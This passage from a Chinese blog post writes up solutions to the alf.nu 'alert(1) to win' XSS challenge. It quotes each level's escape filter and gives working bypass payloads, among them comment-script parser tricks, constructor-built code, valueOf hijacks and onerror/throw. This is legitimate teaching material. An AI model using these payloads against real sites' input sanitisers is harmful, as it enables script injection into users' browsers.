class="string">'&lt;\/script&gt;'</span>;</span><br><span class="line">  tag.src = <span class="string">'https://4i.am/?:XSS=0&amp;CT=text/html&amp;raw='</span> + <span class="built_in">encodeURIComponent</span>(s);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">window</span>.WINNING = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123; youWon = <span class="literal">true</span>; &#125;;</span><br><span class="line"></span><br><span class="line">  tag.setAttribute(<span class="string">'onload'</span>, <span class="string">'youWon &amp;&amp; alert(1)'</span>);</span><br><span class="line">  <span class="keyword">return</span> tag.outerHTML;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题其实也挺好玩的，如果比较熟悉iframe的特性的话，其实也很简单很快就做出来了，但是如果不知道的话，那就挺花时间的了。<br>这题关键在于使得<code>youWon</code>这个变量的值为true，然后就可以触发alert(1)了。首先看一下我们注入的地方是一个URL，题目有说，这个url页面返回的页面就是我们输入的内容。也就是说iframe的内容是由我们决定的。<br>我们的输入会包裹在一个<code>script</code>标签里面。<br>要做出这道题，我们要知道两点iframe的特性</p>
<ol>
<li>iframe的name属性值，同时会注入到父页面的全局窗口对象中。</li>
<li>iframe的name属性，则iframe的window.name的值同时会设置为这个name属性值。反过来也是一样的，不过有个前提时iframe并没有设置name属性。也就是说如果设置了iframe的window.name，同时也会将iframe的name属性值设置为同样的值（前提是它不存在的话，不能被覆盖）</li>
</ol>
<p>所以，答案出来了。<br>solution(13)： <code>name=&#39;youWon&#39;</code><br><br><br><br><br></p>
<h1 id="TI-S-M"><a href="#TI-S-M" class="headerlink" title="TI(S)M"></a>TI(S)M</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">json</span>(<span class="params">s</span>) </span>&#123; <span class="keyword">return</span> <span class="built_in">JSON</span>.stringify(s).replace(<span class="regexp">/\//g</span>, <span class="string">'\\/'</span>); &#125;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">html</span>(<span class="params">s</span>) </span>&#123; <span class="keyword">return</span> s.replace(<span class="regexp">/[&lt;&gt;"&amp;]/g</span>, <span class="function"><span class="keyword">function</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">                        <span class="keyword">return</span> <span class="string">'&amp;#'</span> + s.charCodeAt(<span class="number">0</span>) + <span class="string">';'</span>; &#125;); &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> (</span><br><span class="line">    <span class="string">'&lt;script&gt;'</span> +</span><br><span class="line">      <span class="string">'var url = '</span> + json(s) + <span class="string">'; // We\'ll use this later '</span> +</span><br><span class="line">    <span class="string">'&lt;/script&gt;\n\n'</span> +</span><br><span class="line">    <span class="string">'  &lt;!-- for debugging --&gt;\n'</span> +</span><br><span class="line">    <span class="string">'  URL: '</span> + html(s) + <span class="string">'\n\n'</span> +</span><br><span class="line">    <span class="string">'&lt;!-- then suddenly --&gt;\n'</span> +</span><br><span class="line">    <span class="string">'&lt;script&gt;\n'</span> +</span><br><span class="line">    <span class="string">'  if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n'</span> +</span><br><span class="line">    <span class="string">'  else new Image().src = url;\n'</span> +</span><br><span class="line">    <span class="string">'&lt;/script&gt;'</span></span><br><span class="line">  );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题思路也是由刚刚那个博主提供的。原理我暂时也不是很清楚。大概意思就是在HTML5中如果遇到<code>&lt;!--&lt;script&gt;</code>，就会认为接下的代码是JS代码，直到遇到结束的<code>script</code>标签，但是必须得保证有相应的<code>-&gt;</code>，否则会认为语法出错的。<br>具体的内容可以到刚刚那个博主里看吧，我就直接给出答案了。<br>solution(25): <code>if(alert(1)/*&lt;!--&lt;script&gt;</code><br><br><br><br><br></p>
<h1 id="JSON-Ⅲ"><a href="#JSON-Ⅲ" class="headerlink" title="JSON Ⅲ"></a>JSON Ⅲ</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> s.split(<span class="string">'#'</span>).map(<span class="function"><span class="keyword">function</span>(<span class="params">v</span>) </span>&#123;</span><br><span class="line">      <span class="comment">// Only 20% of slashes are end tags; save 1.2% of total</span></span><br><span class="line">      <span class="comment">// bytes by only escaping those.</span></span><br><span class="line">      <span class="keyword">var</span> json = <span class="built_in">JSON</span>.stringify(v).replace(<span class="regexp">/&lt;\//g</span>, <span class="string">'&lt;\\/'</span>);</span><br><span class="line">      <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log('</span>+json+<span class="string">')&lt;/script&gt;'</span>;</span><br><span class="line">      &#125;).join(<span class="string">''</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>利用上一题的办法就可以做出来了。<br>solution(29): <code>&lt;!--&lt;script&gt;#)/;alert(1)//--&gt;</code><br>分析一下这个答案。<br>输入这个答案，会输入如下结果：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="built_in">console</span>.log(<span class="string">"&lt;!--&lt;script&gt;"</span>)&lt;<span class="regexp">/script&gt;&lt;script&gt;console.log(")/</span>;alert(<span class="number">1</span>)<span class="comment">//--&gt;")&lt;/script&gt;</span></span><br></pre></td></tr></table></figure>

<p>因为我们注入了<code>&lt;!--&lt;script&gt;</code>，导致parser将这一段都当作JS来处理。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">console</span>.log(<span class="string">"&lt;!--&lt;script&gt;"</span>)&lt;<span class="regexp">/script&gt;&lt;script&gt;console.log(")/</span>;alert(<span class="number">1</span>)<span class="comment">//--&gt;")</span></span><br></pre></td></tr></table></figure>

<p>js引擎会解析成如下的样子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">console.log(&quot;junk_string&quot;) &lt; /junk_regexp/ ; alert(1) // --&gt;</span><br></pre></td></tr></table></figure>

<p>其中<br>junk_string代表： <code>&lt;!--&lt;script&gt;</code><br>junk_regexp代表： <code>script&gt;&lt;script&gt;console.log(&quot;&quot;)</code><br>我们的solution中注入的其中两个字符<code>)/</code>就为了欺骗JS引擎，JS引擎会将两个斜杠之间的内容当作正则表达式处理，用这个办法来闭合掉这些多余的字符。<br><br><br><br><br></p>
<h1 id="Skandia-Ⅲ"><a href="#Skandia-Ⅲ" class="headerlink" title="Skandia Ⅲ"></a>Skandia Ⅲ</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (<span class="regexp">/[\\&lt;&gt;]/</span>.test(s)) <span class="keyword">return</span> <span class="string">'-'</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log("'</span> + s.toUpperCase() + <span class="string">'")&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题和上一题<code>Skandia ][</code>差不多的做法。不过因为过滤多了一个反斜杆，所以不能用八进制来代替了。那就要换一种思路。<br>先来看看下面的表格。<br><img src="/image/1.png" alt><br>这里的表格是说，左边的输入是可以返回右边的字符串的。大家可以在试试。<br>所以可以用这个办法来获取我们需要的字符串<br><img src="/image/2.png" alt><br>所以最后的payload(246):</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"+[][(''+!1)[3]+(''+&#123;&#125;)[1]+(''+!0)[1]+(''+!0)[0]][(''+&#123;&#125;)[5]+(''+&#123;&#125;)[1]+(''+&#123;&#125;[0])[1]+(''+!1)[3]+(''+!0)[0]+(''+!0)[1]+(''+!0)[2]+(''+&#123;&#125;)[5]+(''+!0)[0]+(''+&#123;&#125;)[1]+(''+!0)[1]]((''+!1)[1] + (''+!1)[2] + (''+!1)[4] +(''+!0)[1]+(''+!0)[0]+"</span>(<span class="number">1</span>)<span class="string">")())//`</span></span><br></pre></td></tr></table></figure>

<p>如果把我们所需要的字母都赋给一个变量，那么这个payload可以更短一些</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_=<span class="string">''</span>+!<span class="number">1</span>+!<span class="number">0</span>+&#123;&#125;[<span class="number">0</span>]+&#123;&#125;  <span class="comment">//_="falsetrueundefined[object Object]"</span></span><br></pre></td></tr></table></figure>

<p>所以payload可以缩短成144个字符：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">");_=''+!1+!0+&#123;&#125;[0]+&#123;&#125;;[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//</span></span><br></pre></td></tr></table></figure>

<p><br><br><br><br></p>
<h1 id="RFC4627"><a href="#RFC4627" class="headerlink" title="RFC4627"></a>RFC4627</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">text</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> i = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">window</span>.the_easy_but_expensive_way_out = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123; alert(i++) &#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// "A JSON text can be safely passed into JavaScript's eval() function</span></span><br><span class="line"><span class="comment">// (which compiles and executes a string) if all the characters not</span></span><br><span class="line"><span class="comment">// enclosed in strings are in the set of characters that form JSON</span></span><br><span class="line"><span class="comment">// tokens."</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!(<span class="regexp">/[^,:&#123;&#125;\[\]0-9.\-+Eaeflnr-u \n\r\t]/</span>.test(</span><br><span class="line">          text.replace(<span class="regexp">/"(\\.|[^"\\])*"/g</span>, <span class="string">''</span>)))) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123; </span><br><span class="line">      <span class="keyword">var</span> val = <span class="built_in">eval</span>(<span class="string">'('</span> + text + <span class="string">')'</span>);</span><br><span class="line">      <span class="built_in">console</span>.log(<span class="string">''</span> + val);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (_) &#123;</span><br><span class="line">      <span class="built_in">console</span>.log(<span class="string">'Crashed: '</span>+_);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">'Rejected.'</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>据说这题是基于真实的案例，<a href="https://twitter.com/WisecWisec" target="_blank" rel="noopener">Stefano Di Paola</a>记载在这篇<a href="http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html" target="_blank" rel="noopener">文章</a>中。<br>仔细看一下这个表达式，它是允许我们输入<code>self</code>的，如果是这样的话，我们就可以通过它来调用全局函数<code>the_easy_but_expensive_way_out</code>了。<br>这题的技巧就是让一个对象和一个值或者一个字符相加。这样JS引擎就会去计算我们的对象的值，怎么计算呢？就是调用这个对象的<code>valueOf</code>方法，如果我们将valueOf方法定义为题目中的<code>the_easy_but_expenssive_way_out</code>，，就可以触发alert函数了，但是由于是alert(i++)，i从0开始，所以我们要调用两次。<br>solution(103): <code>{&quot;valueOf&quot;:self[&quot;the_easy_but_expensive_way_out&quot;]}+0,{&quot;valueOf&quot;:self[&quot;the_easy_but_expensive_way_out&quot;]}</code><br>需要提醒的是，第一次是由<code>eval</code>调用，第二次是由<code>console.log</code>调用。<br><br><br><br><br></p>
<h1 id="Brunn"><a href="#Brunn" class="headerlink" title="Brunn"></a>Brunn</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  http:<span class="comment">//www.avlidienbrunn.se/xsschallenge/</span></span><br><span class="line"></span><br><span class="line">  s = s.replace(<span class="regexp">/[\r\n\u2028\u2029\\;,()\[\]&lt;]/g</span>, <span class="string">''</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="string">"&lt;script&gt; var email = '"</span> + s + <span class="string">"'; &lt;\/script&gt;"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分号尖括号都被过滤掉了，所以普通的办法是无效的。但是上一题的方法还是有用。<br>所以应该构造的payload是：<br><code>&#39;+{valueOf:Function(&#39;alert(1)&#39;)}//</code><br>或者<code>&#39;+{valueOf:function(){alert(1)}}//</code><br>或者<code>&#39;+{valueOf:()=&gt;{alert(1)}}//</code><br>或者<code>&#39;+{valueOf:a=&gt;{alert(1)}}//</code><br>但是有新的一个问题就是不能使用小括号和中括号。<br>对于这个问题，可以用<a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals" target="_blank" rel="noopener">Tag Function</a>来解决这个问题。<br>solution(85):</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'+&#123;valueOf:Function`a$&#123;'</span>alert<span class="string">'+String.fromCharCode`40`+1+String.fromCharCode`41`&#125;`&#125;//</span></span><br></pre></td></tr></table></figure>

<p><br><br><br><br></p>
<h1 id="No"><a href="#No" class="headerlink" title="No"></a>No</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// submitted by Stephen Leppik</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">    s = s.replace(<span class="regexp">/[()`&lt;]/g</span>, <span class="string">''</span>); <span class="comment">// no function calls</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="string">'&lt;script&gt;\n'</span> +</span><br><span class="line">           <span class="string">'var string = "'</span> + s + <span class="string">'";\n'</span> +</span><br><span class="line">           <span class="string">'console.log(string);\n'</span> +</span><br><span class="line">           <span class="string">'&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>参考资料：<a href="http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/" target="_blank" rel="noopener">XSS technique without parentheses</a><br>solution(39): <code>&quot;;onerror=eval;throw&#39;=alert\x281\x29&#39;//</code><br><br><br><br><br></p>
<h1 id="K’Z’K"><a href="#K’Z’K" class="headerlink" title="K’Z’K"></a>K’Z’K</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// submitted by Stephen Leppik</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// remove vowels in honor of K'Z'K the Destroyer</span></span><br><span class="line">    s = s.replace(<span class="regexp">/[aeiouy]/gi</span>, <span class="string">''</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log("'</span> + s + <span class="string">'");&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个题要用的办法还是和题目一样Skandia ][]，但是不用全部都用八进制来替换，只要替换掉元音字母就可以了。<br>solution(60):  <code>&quot;,[][&quot;p\x6fp&quot;][&quot;c\x6fnstr\x75ct\x6fr&quot;](&#39;\x61l\x65rt(1)&#39;)(),&quot;</code></p>
<p><br><br><br><br></p>
<h1 id="K’Z’K-1"><a href="#K’Z’K-1" class="headerlink" title="K’Z’K"></a>K’Z’K</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// submitted by Stephen Leppik</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// remove vowels and escape sequences in honor of K'Z'K </span></span><br><span class="line">    <span class="comment">// y is only sometimes a vowel, so it's only removed as a literal</span></span><br><span class="line">    s = s.replace(<span class="regexp">/[aeiouy]|\\((x|u00)([46][159f]|[57]5)|1([04][15]|[15][17]|[26]5))/gi</span>, <span class="string">''</span>)</span><br><span class="line">    <span class="comment">// remove certain characters that can be used to get vowels</span></span><br><span class="line">    s = s.replace(<span class="regexp">/[&#123;&#125;!=&lt;&gt;]/g</span>, <span class="string">''</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log("'</span> + s + <span class="string">'");&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题有个正则替换，将我们的八进制或者十六进制都给替换成空了，但是我们可以结合上一题的做法和题目JSON ][的方法就可以了。<br>solution(85): <code>&quot;);[][&quot;p\x\x6f6fp&quot;][&quot;c\x\x6f6fnstr\x\x7575ct\x\x6f6fr&quot;](&#39;\x\x6161l\x\x6565rt(1)&#39;)()//</code></p>
<p><br><br><br><br></p>
<h1 id="K’Z’K-2"><a href="#K’Z’K-2" class="headerlink" title="K’Z’K"></a>K’Z’K</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// submitted by Stephen Leppik</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// remove vowels in honor of K'Z'K the Destroyer</span></span><br><span class="line">    s = s.replace(<span class="regexp">/[aeiouy]/gi</span>, <span class="string">''</span>);</span><br><span class="line">    <span class="comment">// remove certain characters that can be used to get vowels</span></span><br><span class="line">    s = s.replace(<span class="regexp">/[&#123;&#125;!=&lt;&gt;\\]/g</span>, <span class="string">''</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log("'</span> + s + <span class="string">'");&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题复杂一点，没想到好办法。所以还是用老办法。<br>solution(190): </p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">");[]['m'+(++[][[]]+[])[1]+'p']['c'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'nstr'+([][[]]+[])[0]+'ct'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'r']((++[][[]]+[])[1]+'l'+([][[]]+[])[3]+'rt(1)')()//</span></span><br></pre></td></tr></table></figure>

<p><br><br><br><br></p>
<h1 id="Fruit-1"><a href="#Fruit-1" class="headerlink" title="Fruit 1"></a>Fruit 1</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> div = <span class="built_in">document</span>.implementation.createHTMLDocument().createElement(<span class="string">'div'</span>);</span><br><span class="line">  div.innerHTML = s;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">f</span>(<span class="params">n</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="string">'SCRIPT'</span> === n.tagName) n.parentNode.removeChild(n);</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">var</span> i=<span class="number">0</span>; i&lt;n.attributes.length; i++) &#123;</span><br><span class="line">      <span class="keyword">var</span> name = n.attributes[i].name;</span><br><span class="line">      <span class="keyword">if</span> (name !== <span class="string">'class'</span>) &#123; n.removeAttribute(name); &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  [].map.call(div.querySelectorAll(<span class="string">'*'</span>), f);</span><br><span class="line">  <span class="keyword">return</span> div.innerHTML;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个题目的漏洞来源于代码的逻辑不严谨。<br>关键在于第6行中的<code>i&lt;n.attributes.length</code>，但是这个length是动态变化的，导致如果有多个属性的时候，就还剩下一个属性是删不掉了。<br>这样的话我们就构造多个属性好了，将<code>onload=alert(1)</code>放后面。<br>solution(26): <code>&lt;iframe t onload=alert(1)&gt;</code></p>
<p><br><br><br><br></p>
<h1 id="Fruit-2"><a href="#Fruit-2" class="headerlink" title="Fruit 2"></a>Fruit 2</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> div = <span class="built_in">document</span>.implementation.createHTMLDocument().createElement(<span class="string">'div'</span>);</span><br><span class="line">  div.innerHTML = s;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">f</span>(<span class="params">n</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="regexp">/script/i</span>.test(n.tagName)) n.parentNode.removeChild(n);</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">var</span> i=<span class="number">0</span>; i&lt;n.attributes.length; i++) &#123;</span><br><span class="line">      <span class="keyword">var</span> name = n.attributes[i].name;</span><br><span class="line">      <span class="keyword">if</span> (name !== <span class="string">'class'</span>) &#123; n.removeAttribute(name); &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  [].map.call(div.querySelectorAll(<span class="string">'*'</span>), f);</span><br><span class="line">  <span class="keyword">return</span> div.innerHTML;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这一题改变了第五行的if语句，看不出来会带来什么不同的影响。<br>至少对于我上一题的解法没影响，所以用同样的方法就可以。<br><br><br><br><br></p>
<h1 id="Fruit-3"><a href="#Fruit-3" class="headerlink" title="Fruit 3"></a>Fruit 3</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> div = <span class="built_in">document</span>.implementation.createHTMLDocument().createElement(<span class="string">'div'</span>);</span><br><span class="line">  div.innerHTML = s;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">f</span>(<span class="params">n</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="regexp">/script/i</span>.test(n.tagName)) n.parentNode.removeChild(n);</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">var</span> i=<span class="number">0</span>; i&lt;n.attributes.length; i++) &#123;</span><br><span class="line">      <span class="keyword">var</span> name = n.attributes[i].name;</span><br><span class="line">      <span class="keyword">if</span> (name !== <span class="string">'class'</span>) &#123; n.removeAttribute(name); i--; &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  [].map.call(div.querySelectorAll(<span class="string">'*'</span>), f);</span><br><span class="line">  <span class="keyword">return</span> div.innerHTML;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>不会。<br><br><br><br><br></p>
<h1 id="Quine"><a href="#Quine" class="headerlink" title="Quine"></a>Quine</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// submitted by Somebody</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// We've got a quine level in all of the other</span></span><br><span class="line">    <span class="comment">// games, so why not have one here?</span></span><br><span class="line">    <span class="keyword">var</span> win = alert;</span><br><span class="line">    <span class="built_in">window</span>.alert = <span class="function"><span class="keyword">function</span>(<span class="params">t</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (t === s)</span><br><span class="line">            win(<span class="number">1</span>);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="built_in">console</span>.log(<span class="string">"Alert: "</span> + t + <span class="string">"\n(That's not a quine)"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> s;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题很有意思。可惜我不会啊。<br><br><br><br><br><br>参考<a href="http://www.pwntester.com/blog/2014/01/06/escape-alf-nu-xss-challenges-write-ups-part-148/" target="_blank" rel="noopener">博客-上</a></p>
<p>参考<a href="http://www.pwntester.com/blog/2014/01/08/escape-alf-nu-xss-challenges-write-ups-part-257/" target="_blank" rel="noopener">博客-下</a></p>

      </div>
      <footer class="post-footer">
        
        <nav class="post-nav"><a class="prev" href="/2018/02/08/sqli-labs挑战记录/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">sqli-labs挑战记录</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"><div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div></div>
      </main>

      <footer id="footer" class="footer"><div class="social-links"><a href="mailto:cxliker@qq.com" class="iconfont icon-email" title="email"></a>
        <a href="https://github.com/cxliker" class="iconfont icon-github" title="github"></a>
        <a href="https://cxliker.github.io/rss" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    由 <a class="hexo-link" href="https://hexo.io/">Hexo</a> 强力驱动
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    主题 - 
    <a class="theme-link" href="https://github.com/ahonn/hexo-theme-even">Even</a>
  </span>

  <span class="copyright-year">&copy;2018 - 2019<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">danta</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://cxliker.github.io/2018/01/29/XSS练习-alf-nu-alert1-Write-ups/';
